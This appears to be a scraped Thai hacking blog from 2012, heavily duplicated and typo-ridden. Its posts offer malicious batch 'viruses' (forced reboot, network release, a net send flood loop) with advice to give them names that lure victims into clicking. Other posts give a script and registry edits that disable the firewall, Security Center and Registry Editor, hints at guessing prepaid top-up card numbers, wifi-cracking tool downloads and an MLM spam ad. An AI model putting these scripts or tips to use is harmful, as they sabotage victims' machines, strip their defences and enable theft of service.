การทำงานของอินเตอร์เน็ตอยุ่ในลักษณะ PacKet Swits ดดยแบ่งอยกออกตามข้อความออกมาเป็นหน่วยตามบรรจุจำนวนที่เหมาสม เรียนว่า Packet และถูกสกั้ดกันโดย Router ซึ่งมีหน้าที่อ่าน เพื่อส่งไปยังทิศทางที่ถูกต้อง คอมพิวเตอร์ทุกเครื่องส่วนนอกนั้นจะแปลสิ่งที่ว่า TCP/IP ได้เหมือนๆกัน
- Internet คืออะไร
เป็นเครื่อข่ายที่ใหญ่มาก (ซึ่งถูกย่อเป็น www ) ที่เชือมต่อคอมพิวเตอร์ทั่วโลกเข้าด้วยกันนั้นเอง
- Internet ทำงานอย่างไร (โปรก็ควรอ่าน)
การทำงานของอินเตอร์เน็ตอยุ่ในลักษณะ PacKet Swits ดดยแบ่งอยกออกตามข้อความออกมาเป็นหน่วยตามบรรจุจำนวนที่เหมาสม เรียนว่า Packet และถูกสกั้ดกันโดย Router ซึ่งมีหน้าที่อ่าน เพื่อส่งไปยังทิศทางที่ถูกต้อง คอมพิวเตอร์ทุกเครื่องส่วนนอกนั้นจะแปลสิ่งที่ว่า TCP/IP ได้เหมือนๆกัน
เราสามารถ hack บัตรเติมเงินโทรศัพท์ ได้หรือไม่
บังเอิญได้อ่านบทความนี้มาจาก Net พบว่า เป็นโจทย์ที่น่าคิดมาก เพราะผมก็ใช้บัตรเติมเงินอยู่ เป็นของ dtac
บทความนี้อธิบายทางวิชาการ ดังนั้น คาดว่า จะไม่เป็นโทษแต่อย่างไร
เราต้องอธิบายก่อนนะครับ บัตรเติมเงินของ dtac ประกอบด้วย หมายเลขบัตร (ตัวเลขที่ไม่ต้องขูด มี 9 หลัก) กับ รหัสบัตรเติมเงิน (ตัวเลขที่ต้องขูด มี 6 หลัก) เป็นไปได้ครับ ที่เราจะได้หมายเลขบัตรเติมเงิน ติดต่อกัน เช่น 6387 10218 บัตรต่อไปเป็น 6387 10219 ดังนั้น เราสามารถเดาบัตรต่อๆไปได้ เช่น 6387 10220 เป็นต้น ถ้าหากบัตรหมายเลขนี้ยังไม่ถูกใช้มาก่อน ก็เป็นไปได้ครับ
แต่ว่า เนื่องจากระบบการเติมเงิน ของเครือข่าย DTAC ต้องใส่หมายเลขบัตร ระหว่างขั้นตอนการเติมเงิน ทำให้รูปแบบเติมเงินวิธีนี้ มีลักษณะคล้ายกับการใช้บริการบัตร ATM ที่เครื่อง ATM อ่านหมายเลขบัตร แล้วสอดเข้าไป จึงพิจารณาว่ารหัสที่เรากดนั้น ตรงกับรหัสที่ถูกบันทึกไว้หรือไม่ กระบวนการนี้ระบบสามารถตรวจสอบว่าบัตรแต่ละใบถูกใช้ไปแล้วหรือยัง ถ้าหมายเลขบัตรที่เราเลือกถูกใช้ไปแล้ว ก็ไม่สามารถเติมเงินจากบัตรใบนั้นได้อีกต่อไป
สมมุติว่าบัตรเติมเงิน ใบที่เราต้องการเติมเงิน โดยไม่ขูดรหัสนั้นยังไม่ถูกเติมเงินไป เรายังมีสิทธิจะเติมเงินจากบัตรใบนั้นได้อยู่ ถ้าเราสามารถใส่รหัสของบัตรเติมเงินใบนั้นได้ถูกต้อง ซึ่งรหัสดังกล่าวสำหรับระบบ Happy Dprompt จะประกอบไปด้วยตัวเลขจำนวน 6 หลัก
บทความนี้อธิบายทางวิชาการ ดังนั้น คาดว่า จะไม่เป็นโทษแต่อย่างไร
เราต้องอธิบายก่อนนะครับ บัตรเติมเงินของ dtac ประกอบด้วย หมายเลขบัตร (ตัวเลขที่ไม่ต้องขูด มี 9 หลัก) กับ รหัสบัตรเติมเงิน (ตัวเลขที่ต้องขูด มี 6 หลัก) เป็นไปได้ครับ ที่เราจะได้หมายเลขบัตรเติมเงิน ติดต่อกัน เช่น 6387 10218 บัตรต่อไปเป็น 6387 10219 ดังนั้น เราสามารถเดาบัตรต่อๆไปได้ เช่น 6387 10220 เป็นต้น ถ้าหากบัตรหมายเลขนี้ยังไม่ถูกใช้มาก่อน ก็เป็นไปได้ครับ
แต่ว่า เนื่องจากระบบการเติมเงิน ของเครือข่าย DTAC ต้องใส่หมายเลขบัตร ระหว่างขั้นตอนการเติมเงิน ทำให้รูปแบบเติมเงินวิธีนี้ มีลักษณะคล้ายกับการใช้บริการบัตร ATM ที่เครื่อง ATM อ่านหมายเลขบัตร แล้วสอดเข้าไป จึงพิจารณาว่ารหัสที่เรากดนั้น ตรงกับรหัสที่ถูกบันทึกไว้หรือไม่ กระบวนการนี้ระบบสามารถตรวจสอบว่าบัตรแต่ละใบถูกใช้ไปแล้วหรือยัง ถ้าหมายเลขบัตรที่เราเลือกถูกใช้ไปแล้ว ก็ไม่สามารถเติมเงินจากบัตรใบนั้นได้อีกต่อไป
สมมุติว่าบัตรเติมเงิน ใบที่เราต้องการเติมเงิน โดยไม่ขูดรหัสนั้นยังไม่ถูกเติมเงินไป เรายังมีสิทธิจะเติมเงินจากบัตรใบนั้นได้อยู่ ถ้าเราสามารถใส่รหัสของบัตรเติมเงินใบนั้นได้ถูกต้อง ซึ่งรหัสดังกล่าวสำหรับระบบ Happy Dprompt จะประกอบไปด้วยตัวเลขจำนวน 6 หลัก
วันพุธที่ 8 กุมภาพันธ์ พ.ศ. 2555
ที่สุดของ Hacker ที่ Hacker ไฝ่ฝันไขว้ขว้ามันมา
เรื่องนี้อาจเป็นเรื่องสุดท้ายของผม ก่อนไปผมอยากเห็น พวกคุณ ขอบคุณ ผมจริงๆจังๆสักที ขอคุณครับ :-\ :-\
- สิ่งที่ Hacker ต้องการ
1. นำไฟล์อันตรายต่างๆเข้า Starup
2.ปิด Refistry Editor
เข้า HKEY-CURRENT-USER/Sofware/Microsoft/windows/CurrentVersion/Policies/System สร้าง DWORD Value = DisableRegistry Tools Value data = 1
ห้ามนำไฟล์ .reg เพื่อแก้ไขข้อข้างข้างต้น HKEY-CLASSES-ROOT/.reg สร้าง Steing Value = (Default) Value data = txtfile
3.ปิดFirewall หรือ แอบเข้า Firewall
โดยใช้ Firewalking
โค้ด Notepage
เช่น รุ้ port รุ้ IP รู้ Mac adreed รู้ OS ด้วยวิธีการต่างๆ
5.สร้าง back door
การส้รางช่องโหว่ลับ ในเครื่องเหยื่อ
6.ปิดการทำงานของ Anti virus
- เตียมตัวก่อน Hack
1.ซ่อน IP
ด้วยโปรแกรมต่างๆ
2.ซ่อน Mac adreed
ด้วยโปรแกรมต่างๆ
3.สร้าง proxy เถื่อน
หากใช้ proxy จริงอาจถูกจับได้ง่าย
- ความปราถนาของ Hacker ในการ Hack Web
การฝัง File manager ในเซอร์เวอร์ได้
หาได้จาก เว็บ suneworld.com
ข้อมูลจาก ruk-com.in.th
- สิ่งที่ Hacker ต้องการ
1. นำไฟล์อันตรายต่างๆเข้า Starup
2.ปิด Refistry Editor
เข้า HKEY-CURRENT-USER/Sofware/Microsoft/windows/CurrentVersion/Policies/System สร้าง DWORD Value = DisableRegistry Tools Value data = 1
ห้ามนำไฟล์ .reg เพื่อแก้ไขข้อข้างข้างต้น HKEY-CLASSES-ROOT/.reg สร้าง Steing Value = (Default) Value data = txtfile
3.ปิดFirewall หรือ แอบเข้า Firewall
โดยใช้ Firewalking
โค้ด Notepage
@echo off
net stop "Security Center"
netsh firewall set opmaode mode=disable
4.รุ้ข้อมูลเครื่องเหยื่อ net stop "Security Center"
netsh firewall set opmaode mode=disable
เช่น รุ้ port รุ้ IP รู้ Mac adreed รู้ OS ด้วยวิธีการต่างๆ
5.สร้าง back door
การส้รางช่องโหว่ลับ ในเครื่องเหยื่อ
6.ปิดการทำงานของ Anti virus
- เตียมตัวก่อน Hack
1.ซ่อน IP
ด้วยโปรแกรมต่างๆ
2.ซ่อน Mac adreed
ด้วยโปรแกรมต่างๆ
3.สร้าง proxy เถื่อน
หากใช้ proxy จริงอาจถูกจับได้ง่าย
- ความปราถนาของ Hacker ในการ Hack Web
การฝัง File manager ในเซอร์เวอร์ได้
หาได้จาก เว็บ suneworld.com
ข้อมูลจาก ruk-com.in.th
Basic Hacker
พื้นฐานนะครับ บอกไว้ก่อน เดี่ยวจะหาว่าผมยังโน้นยังนี้ครับ
คือว่าผมได้ซื้อหนังสือมาเล่มนึงเห้นว่ามีประโยช ก็เลยจะpost ให้ อ่านเป็น หัวข้อๆ ไปครับ
ว่าด้วยเรื่องของ
- การแกะรอย
- การสแกน
- การรวบรวมข้อมูล
- การเจาะระบบ
- การยกระดับสิทธิ
- การให้ได้มาซึ่ง commant shell(หรือว่าการ ขโมยดอส นั่นเองครับ)
- การข้อโมยข้อมูล
- การแผ่นขยายอิทธิพลของการโจมตี
- การทำลายร่องรอย
เดี่ยวผมว่างผมจะ post ใส่เรื่อยๆนะครับ ใจเย็นรอหน่อยนะครับ
เดี่ยววันที่ 4 นี้ผมจะไปมหาลยแล้วหล่ะ (อิอิ ตื่นเต้น ได้เรียกชื่อ รร ว่า มหาลัย เหมือนกะคนอื่นเค้า สักที 55+)
-----------------------------------------------------------------------------------
จัดทำ profile ให้กับเป้าหมาย (รู้เขารู้เรารบร้อย ชนะทั้งร้อย)
-----------------------------------------------------------------------------------
- การแกะรอย
การ แกะรอยอาจถูกมองเทียบได้กับการค้นหา Directory โทรศัพท์เพื่อหา เบอร์ โทรศัพท์และที่อยู่ของหน่วยงานเป้าหมาย ในขณะที่การสแกนนั้นเทียบได้กับการขับรถไปยังตำแหน่งเป้าหมายที่สนใจละหาดู ว่า อาคารไหนมีผู้ครอบครองอยู่ และมีประตูหน้างต่างใดบ้างที่สามารถเข้าไปภายในใด้(อาจจะหมายถึง port นะครับ) การแกะรอยและการสแกนยงเปรียบเทียบได้กับการพยายามค้นหาเป้าหมายและเส้นทาง สำหรับเข้าไปสู่ภายในเห็นได้ชัดว่า การโจมตีที่ผิดพลาด หรือการมองข้ามรายละเอียดเล็กๆน้อยๆของประตูที่ถูกเปิดไว่สามารถทำให้การ โจมตีนั้นไร้ประโยชน์หรือตกรางไปอย่างสิ้นเชิงครับ
[ข้างบนอ่านสักนิดก็ดีครับ (อุส่าพิมพ์ตั้งนาน อิอิ) จะรู้ไปว่าการแกะรอยหมายถึงอะไรครับ]
คือว่าผมได้ซื้อหนังสือมาเล่มนึงเห้นว่ามีประโยช ก็เลยจะpost ให้ อ่านเป็น หัวข้อๆ ไปครับ
ว่าด้วยเรื่องของ
- การแกะรอย
- การสแกน
- การรวบรวมข้อมูล
- การเจาะระบบ
- การยกระดับสิทธิ
- การให้ได้มาซึ่ง commant shell(หรือว่าการ ขโมยดอส นั่นเองครับ)
- การข้อโมยข้อมูล
- การแผ่นขยายอิทธิพลของการโจมตี
- การทำลายร่องรอย
เดี่ยวผมว่างผมจะ post ใส่เรื่อยๆนะครับ ใจเย็นรอหน่อยนะครับ
เดี่ยววันที่ 4 นี้ผมจะไปมหาลยแล้วหล่ะ (อิอิ ตื่นเต้น ได้เรียกชื่อ รร ว่า มหาลัย เหมือนกะคนอื่นเค้า สักที 55+)
-----------------------------------------------------------------------------------
จัดทำ profile ให้กับเป้าหมาย (รู้เขารู้เรารบร้อย ชนะทั้งร้อย)
-----------------------------------------------------------------------------------
- การแกะรอย
การ แกะรอยอาจถูกมองเทียบได้กับการค้นหา Directory โทรศัพท์เพื่อหา เบอร์ โทรศัพท์และที่อยู่ของหน่วยงานเป้าหมาย ในขณะที่การสแกนนั้นเทียบได้กับการขับรถไปยังตำแหน่งเป้าหมายที่สนใจละหาดู ว่า อาคารไหนมีผู้ครอบครองอยู่ และมีประตูหน้างต่างใดบ้างที่สามารถเข้าไปภายในใด้(อาจจะหมายถึง port นะครับ) การแกะรอยและการสแกนยงเปรียบเทียบได้กับการพยายามค้นหาเป้าหมายและเส้นทาง สำหรับเข้าไปสู่ภายในเห็นได้ชัดว่า การโจมตีที่ผิดพลาด หรือการมองข้ามรายละเอียดเล็กๆน้อยๆของประตูที่ถูกเปิดไว่สามารถทำให้การ โจมตีนั้นไร้ประโยชน์หรือตกรางไปอย่างสิ้นเชิงครับ
[ข้างบนอ่านสักนิดก็ดีครับ (อุส่าพิมพ์ตั้งนาน อิอิ) จะรู้ไปว่าการแกะรอยหมายถึงอะไรครับ]
งานพิเศษง่ายๆผ่านระบบอินเตอร์เน็ตรายได้มากกว่า4หมื่นถึงหลักแสนบาทต่อเดือน
งานพิเศษง่ายๆผ่านระบบอินเตอร์เน็ตรายได้มากกว่า4หมื่นถึงหลักแสนบาทต่อเดือนสนใจเข้ามา!!!!
ต้องการที่จะรับสมัครคนที่สนใจทำงานกับระบบThe First Powerที่สามารถทำให้คนธรรมดามีรายได้หลักแสนบาทได้
ด้วยการทำงานงานผ่านระบบInternet WebsiteในธุรกิจNetwork (PART-TIME / FULL-TIME)
มีระบบเช็ครายได้ online realtime ตลอด24ชั่วโมงสามารถตรวจสอบได้
ต้องบอกด้วยว่า"บริษัทของเรามีครบทั้ง 7 สิ่งสำคัญในการทำธุรกิจ"
- คุณสมบัติของผู้ที่สนใจ !!
- ชาย/หญิง ที่มีเวลาและสนใจหางานทำ
- สามารถใช้คอมพิวเตอร์ Internet พื้นฐานได้
- อายุตั้งแต่ 15 ปี ขึ้นไป
- ไม่จำเป็นต้องมีประสบการณ์
- ไม่จำกัดวุฒิการศึกษา
PART-TIME 10000 - 15000 บาท / เดือน
FULL-TIME 30000 บาทขึ้นไป / เดือน
สนใจดูรายละเอียดที่
>>>> http://goo.gl/LtAqQ
ข้อมูลจาก ruk-com.in.th
ต้องการที่จะรับสมัครคนที่สนใจทำงานกับระบบThe First Powerที่สามารถทำให้คนธรรมดามีรายได้หลักแสนบาทได้
ด้วยการทำงานงานผ่านระบบInternet WebsiteในธุรกิจNetwork (PART-TIME / FULL-TIME)
มีระบบเช็ครายได้ online realtime ตลอด24ชั่วโมงสามารถตรวจสอบได้
ต้องบอกด้วยว่า"บริษัทของเรามีครบทั้ง 7 สิ่งสำคัญในการทำธุรกิจ"
- คุณสมบัติของผู้ที่สนใจ !!
- ชาย/หญิง ที่มีเวลาและสนใจหางานทำ
- สามารถใช้คอมพิวเตอร์ Internet พื้นฐานได้
- อายุตั้งแต่ 15 ปี ขึ้นไป
- ไม่จำเป็นต้องมีประสบการณ์
- ไม่จำกัดวุฒิการศึกษา
PART-TIME 10000 - 15000 บาท / เดือน
FULL-TIME 30000 บาทขึ้นไป / เดือน
สนใจดูรายละเอียดที่
>>>> http://goo.gl/LtAqQ
ข้อมูลจาก ruk-com.in.th
วันอาทิตย์ที่ 5 กุมภาพันธ์ พ.ศ. 2555
หาช่องทางแฮก (DDOS)
หาช่องทางแฮก (DDOS)
-การ โจมตีที่เกิดขึ้นมักจะทำให้เกิดการใช้งานแบนด์วิดธ์จนเต็มที่ เช่น SYN flood ถ้าหากทำการกรองแพ็คเก็ตที่ ISP ได้ ก็จะสามารถลดผลกระทบที่จะเกิดขึ้นได้
-ติดตั้ง hardware ที่มีขีดความสามารถสูงไว้ระหว่างเครือข่ายของ ISP กับของระบบที่ต้องการป้องกัน เช่น การติดตั้งเราเตอร์ประสิทธิภาพสูง ที่สามารถทำ filtering ได้
-โดยปกติการโจมตีแบบ DoS ผู้โจมตีมักจะโจมตีไปยังเป้าหมายโดยระบุเป็น ip address โดยตรง ไม่ได้ผ่านการทำ DNS lookup มาก่อน ดังนั้น เมื่อเกิดการโจมตีขึ้น ยังสามารถหาหนทางหลบหลีกการโจมตีดังกล่าวได้ 2 วิธีคือ 1. เปลี่ยน ip address เมื่อเกิดการโจมตี 2. เปลี่ยน ip address ไปเรื่อยๆ แม้จะไม่มีการโจมตี ซึ่งการกระทำทั้งสองรูปแบบก็มีข้อดีข้อเสียต่างกัน ในรูปแบบแรกจะต้องมีระบบตรวจจับที่ดี สามารถแจ้งเตือนผู้ดูแลระบบให้สามารถปรับเปลี่ยน ip address ได้อย่างรวดเร็ว จะเห็นว่ามีช่องว่างระหว่างการดำเนินงานอยู่ แต่ก็มียังมีข้อดีที่ผู้โจมตีจะไม่สามารถรู้แทกติกนี้จนกว่าจะเริ่มโจมตี ในขณะที่วิธีที่สองจะมีความยากลำบากในการเริ่มโจมตีมากกว่า
มีวิธีปฏิบัติที่ใช้ได้จริงซึ่งต้องการการแก้ไขเพียงเล็กน้อย และพยายามลดผลกระทบที่จะเกิดขึ้นกับผู้ใช้ให้น้อยที่สุด ดังนี้
-การ โจมตีที่เกิดขึ้นมักจะทำให้เกิดการใช้งานแบนด์วิดธ์จนเต็มที่ เช่น SYN flood ถ้าหากทำการกรองแพ็คเก็ตที่ ISP ได้ ก็จะสามารถลดผลกระทบที่จะเกิดขึ้นได้
-ติดตั้ง hardware ที่มีขีดความสามารถสูงไว้ระหว่างเครือข่ายของ ISP กับของระบบที่ต้องการป้องกัน เช่น การติดตั้งเราเตอร์ประสิทธิภาพสูง ที่สามารถทำ filtering ได้
-โดยปกติการโจมตีแบบ DoS ผู้โจมตีมักจะโจมตีไปยังเป้าหมายโดยระบุเป็น ip address โดยตรง ไม่ได้ผ่านการทำ DNS lookup มาก่อน ดังนั้น เมื่อเกิดการโจมตีขึ้น ยังสามารถหาหนทางหลบหลีกการโจมตีดังกล่าวได้ 2 วิธีคือ 1. เปลี่ยน ip address เมื่อเกิดการโจมตี 2. เปลี่ยน ip address ไปเรื่อยๆ แม้จะไม่มีการโจมตี ซึ่งการกระทำทั้งสองรูปแบบก็มีข้อดีข้อเสียต่างกัน ในรูปแบบแรกจะต้องมีระบบตรวจจับที่ดี สามารถแจ้งเตือนผู้ดูแลระบบให้สามารถปรับเปลี่ยน ip address ได้อย่างรวดเร็ว จะเห็นว่ามีช่องว่างระหว่างการดำเนินงานอยู่ แต่ก็มียังมีข้อดีที่ผู้โจมตีจะไม่สามารถรู้แทกติกนี้จนกว่าจะเริ่มโจมตี ในขณะที่วิธีที่สองจะมีความยากลำบากในการเริ่มโจมตีมากกว่า
มีวิธีปฏิบัติที่ใช้ได้จริงซึ่งต้องการการแก้ไขเพียงเล็กน้อย และพยายามลดผลกระทบที่จะเกิดขึ้นกับผู้ใช้ให้น้อยที่สุด ดังนี้
ขั้นแรกของการเป็น Hacker
ผมจะไม่ขอเกริ่นเรื่องชนิดของ hacker นะครับเพราะให้ท่านลอง search ดูตามเว็บไซต์ต่างๆมีเยอะแยะมากมาย ทั้ง blackHat whiteHat GrayHat SuicideHacker cracker hacker etc. เหล่านี้ ต่อให้ยังไงมันก็คือ hacker วันยันค่ำแหละครับไม่ต้องมาบอกหรอกว่าตัวเองเป็นฝ่ายธรรมะ คุณเป็นฝ่ายอธรรม…..อ่ะเข้าเรื่องล่ะ
เรื่องแรกนี้จะให้ท่านได้รู้จักชนิดของการโจมตีของเหล่า hacker จะได้รู้ว่าตอนนี้ระบบของท่านกำลังโดนการโจมตีชนิดใดอยู่จะได้เอามา วิเคราะห์ได้นะครับ
การโจมตีจะมีอยู่ 4 ชนิดด้วยกันคือ
1.Operating System Attacks
2.Appilcation-level Attacks
3.Shrink Wrap code Attacks
4.Misconfiguration Attacks
เรื่องแรกนี้จะให้ท่านได้รู้จักชนิดของการโจมตีของเหล่า hacker จะได้รู้ว่าตอนนี้ระบบของท่านกำลังโดนการโจมตีชนิดใดอยู่จะได้เอามา วิเคราะห์ได้นะครับ
การโจมตีจะมีอยู่ 4 ชนิดด้วยกันคือ
1.Operating System Attacks
2.Appilcation-level Attacks
3.Shrink Wrap code Attacks
4.Misconfiguration Attacks
วันเสาร์ที่ 4 กุมภาพันธ์ พ.ศ. 2555
วิธีสร้างไวรัสแบบง่ายๆ (ถ้าซ้ำขออภัย)
วิธีทำ
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น
Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0
ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release
Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง
Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
==============================
*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว
Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตไ ด้อีก - -'
1.เปิด Notepad ขึ้นมา
2.ก็อปโค้ดดังกล่าวลงไปวาง
3.เซฟไฟล์ชื่ออะไรก็ได้แต่ให้มีนามสกุล .bat (ควรตั้งเพื่อหลอกล่อคนให้คลิก)
***อย่าดับเบิลคลิกเพื่อทดลองเด็ดขาด***
ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใดๆทั้งสิ้น
Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t0
ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ต
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release
Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง
Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
==============================
*ต่อไปนี้จะเป็นไวรัสที่สร้างความรุนแรงจริงๆนะครับ อย่าเผลอลองเชียว
Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตไ ด้อีก - -'
วันพฤหัสบดีที่ 2 กุมภาพันธ์ พ.ศ. 2555
การใช้โปรแกรม NETSTAT
เป็นคำสั่งที่ใช้ตรวจสอบ Network เกี่ยวกับการเชื่อมต่อ Port ในเครื่องเรากับเครื่องอื่นใน Network
จากการใช้คำสั่งจาก DOS Prompt ในรูปข้างบน เป็นการเรียกดูวิธีการใช้ของโปรแกรม netstat โดยการใส่เครื่องหมาย /? ต่อท้ายคำสั่งนั้น (สามารถใช้ได้กับโปรแกรมอย่างอื่นในดอสได้ด้วย) เพื่อขอดูการใช้งาน ผมจะอธิบายที่ละบรรทัดอย่างคร่าวๆ
และ การใช้คำสั่งนี้ ไม่ว่าจะเป็น Opiton หรือใดๆก็ตาม จะไม่เป็นอันตรายต่อเครื่อง รวมทั้งระบบ Network ซึ่งในการใช้ สามารถใช้ได้ในขณะที่ต่อ Internet หรือไม่ก็ตาม
-a Displays all connections and listening ports.
Opiton นี้จะเป็นการดูการเชื่อมต่อ Port ทั้งหมดที่ (เครื่องนั้นๆ=เครื่องคุณ) ที่ใช้คำสั่งนี้ได้เปิดรอการเข้ามาติดต่อ แต่ผลที่แสดงจะเป็นรายชื่อ Service ที่ติดต่อกับเครื่อง (เครื่องนั้นๆ=เครื่องคุณ) เช่นชื่อเว็บไซด์หรือชื่อเครื่อง ไม่แสดงเป็นตัวเลข IP
-e Displays Ethernet statistics. This may be combined with the -s option.
Opiton นี้จะเป็นการดูเหมือนกับสถิติต่างๆในการรับ/ส่งข้อมูลต่างๆ ต้องใช้ร่วมกับ Opiton -s เป็นการดูสถานะการรับส่งข้อมูลต่างๆ ซึ่งลองใช้ดูได้
-n Displays addresses and port numbers in numerical form.
Opiton นี้จะเหมือนกับ -a แต่การแสดงผลจะเป็นเลข IP กับ Port แทนชื่อเครื่องหรือชื่อเว็บไซด์ต่างๆที่ได้มีการติดต่อหรือเชื่อมการติดต่อ
การใช้งาน netstat (แบบดอส)
จากการใช้คำสั่งจาก DOS Prompt ในรูปข้างบน เป็นการเรียกดูวิธีการใช้ของโปรแกรม netstat โดยการใส่เครื่องหมาย /? ต่อท้ายคำสั่งนั้น (สามารถใช้ได้กับโปรแกรมอย่างอื่นในดอสได้ด้วย) เพื่อขอดูการใช้งาน ผมจะอธิบายที่ละบรรทัดอย่างคร่าวๆ
และ การใช้คำสั่งนี้ ไม่ว่าจะเป็น Opiton หรือใดๆก็ตาม จะไม่เป็นอันตรายต่อเครื่อง รวมทั้งระบบ Network ซึ่งในการใช้ สามารถใช้ได้ในขณะที่ต่อ Internet หรือไม่ก็ตาม
-a Displays all connections and listening ports.
Opiton นี้จะเป็นการดูการเชื่อมต่อ Port ทั้งหมดที่ (เครื่องนั้นๆ=เครื่องคุณ) ที่ใช้คำสั่งนี้ได้เปิดรอการเข้ามาติดต่อ แต่ผลที่แสดงจะเป็นรายชื่อ Service ที่ติดต่อกับเครื่อง (เครื่องนั้นๆ=เครื่องคุณ) เช่นชื่อเว็บไซด์หรือชื่อเครื่อง ไม่แสดงเป็นตัวเลข IP
-e Displays Ethernet statistics. This may be combined with the -s option.
Opiton นี้จะเป็นการดูเหมือนกับสถิติต่างๆในการรับ/ส่งข้อมูลต่างๆ ต้องใช้ร่วมกับ Opiton -s เป็นการดูสถานะการรับส่งข้อมูลต่างๆ ซึ่งลองใช้ดูได้
-n Displays addresses and port numbers in numerical form.
Opiton นี้จะเหมือนกับ -a แต่การแสดงผลจะเป็นเลข IP กับ Port แทนชื่อเครื่องหรือชื่อเว็บไซด์ต่างๆที่ได้มีการติดต่อหรือเชื่อมการติดต่อ
การใช้งาน netstat (แบบดอส)
SQL Injection
วันนี้ลองมาดูในเรื่องของการเขียน SQL ที่เรียกว่า SQL Injection กันนะค่ะ ในเรื่องของความปลอดภัย ผู้ไม่หวังดีอาจจะลองเขียนหรือกรอกข้อมูลเข้ามาที่ทำให้
SQL Statement เป็นจริงตลอดเพื่อให้ logic ที่เราเขียนเอาไว้นั้นเกิดผิดพลาดขึ้นมา ก้อลองมั่วดูนะค่ะ
ยกตัวอย่างเช่นในการทำหน้า login ด้วย username password เราใช้ SQL Statement ดังนี้
Code:
$SQL = "select *
from member
where username ='$_POST[username]' and password ='$_POST[password]';";
เราไปกำหนดให้ username เป็น 'admin' password มีค่าเป็น '1234' ดังนั้นทดสอบ login ดังภาพที่ 1
หลังจากนั้นเราจะใช้ function mysql_num_rows ในการนับ recordset ว่ามีจำนวนเท่าไหร่ หาก query ถูกต้องแสดงผลลัพธ์ที่มากกว่าศูนย์
ดังนั้นหากคุณลอง กรอก username password ดังรูปที่ 2 จะเห็นได้ว่า ผลลัพธ์จะเป็นจริงเสมอ
ดังนั้นการทำงานของคุณอาจจะผิดพลาดได้ หาก logic ในการ login ไม่ได้ทำการตรวจสอบจำนวนที่แน่นอนใน recordset ที่ได้มา
Nothing for guest!
ข้อมูลจาก ruk-com.in.th
SQL Statement เป็นจริงตลอดเพื่อให้ logic ที่เราเขียนเอาไว้นั้นเกิดผิดพลาดขึ้นมา ก้อลองมั่วดูนะค่ะ
ยกตัวอย่างเช่นในการทำหน้า login ด้วย username password เราใช้ SQL Statement ดังนี้
Code:
$SQL = "select *
from member
where username ='$_POST[username]' and password ='$_POST[password]';";
เราไปกำหนดให้ username เป็น 'admin' password มีค่าเป็น '1234' ดังนั้นทดสอบ login ดังภาพที่ 1
หลังจากนั้นเราจะใช้ function mysql_num_rows ในการนับ recordset ว่ามีจำนวนเท่าไหร่ หาก query ถูกต้องแสดงผลลัพธ์ที่มากกว่าศูนย์
ดังนั้นหากคุณลอง กรอก username password ดังรูปที่ 2 จะเห็นได้ว่า ผลลัพธ์จะเป็นจริงเสมอ
ดังนั้นการทำงานของคุณอาจจะผิดพลาดได้ หาก logic ในการ login ไม่ได้ทำการตรวจสอบจำนวนที่แน่นอนใน recordset ที่ได้มา
Nothing for guest!
ข้อมูลจาก ruk-com.in.th
โกง Hack maplestory adventures 1.15.2.1 เกม fackbook (สอน+โปรแกรม)Update 26/11
ข้อมูลสรุปนี้ไม่พร้อมใช้งาน โปรด
คลิกที่นี่เพื่อดูโพสต์
Hackเล่นเน็ตที่ไหนก็ได้ + วิธีใช้อย่างละเอียด
Hackเล่นเน็ตที่ไหนก็ได้ + วิธีใช้อย่างละเอียด
มีทั้งหมด 4 โปรแกรมนะครับ อยากให้ลองใช้ดูทุกตัว เพราะไฟล์มันเล็ก วิธีใช้ด้านในครับ
ทดลองใช้ค้นหาพาสของ wifi ทั่วไป ได้ประมาน 90 เปอ นะคับ แหะๆ
http://www.duckload.com/download/3162299/aircrack-ng-0_1_.9.3-win.rar
http://www.duckload.com/download/3162391/Hack_Wireless.rar
http://www.duckload.com/download/3162439/HackWireless.rar
http://www.duckload.com/download/3162453/WIRELESS.rar
http://www.duckload.com/download/3162485/_.rar
credit zeed5
ข้อมูลจาก ruk-com.in.th
มีทั้งหมด 4 โปรแกรมนะครับ อยากให้ลองใช้ดูทุกตัว เพราะไฟล์มันเล็ก วิธีใช้ด้านในครับ
ทดลองใช้ค้นหาพาสของ wifi ทั่วไป ได้ประมาน 90 เปอ นะคับ แหะๆ
http://www.duckload.com/download/3162299/aircrack-ng-0_1_.9.3-win.rar
http://www.duckload.com/download/3162391/Hack_Wireless.rar
